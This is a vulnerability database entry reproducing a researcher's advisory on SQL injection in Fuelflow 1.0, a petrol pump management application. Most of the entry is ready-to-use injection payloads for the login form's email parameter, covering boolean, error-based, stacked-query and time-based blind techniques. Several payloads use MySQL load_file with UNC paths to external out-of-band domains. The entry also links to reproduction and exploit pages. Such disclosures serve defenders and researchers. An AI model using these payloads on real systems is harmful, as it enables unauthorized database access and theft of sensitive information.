Lucene search
K

Fuelflow 1.0 SQL Injection

🗓️ 21 Feb 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 350 Views

The Fuelflow 1.0 software from Mayuri K is vulnerable to SQL injection attacks, allowing attackers to extract sensitive information from the system

Code
`## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 02/21/24  
## Vendor: https://www.mayurik.com/  
## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The email parameter appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'  
was submitted in the email parameter. This payload injects a SQL  
sub-query that calls MySQL's load_file function with a UNC file path  
that references a URL on an external domain. The application  
interacted with that domain, indicating that the injected SQL query  
was executed. The attacker can receive very sensitive information  
about this system by using these vulnerabilities!  
  
STATUS: HIGH-Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: email (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: email=-5782' OR 2852=2852 OR  
'nYvi'='GjbH&password=h3I!y3o!F9&submit=  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: [email protected]'+(select  
load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''  
AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT  
(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR  
'BiVP'='cVHj&password=h3I!y3o!F9&submit=  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: [email protected]'+(select  
load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECT  
SLEEP(7)#&password=h3I!y3o!F9&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]'+(select  
load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''  
AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR  
'Lshu'='MGpY&password=h3I!y3o!F9&submit=  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)  
  
## Time spent:  
00:35:00  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
350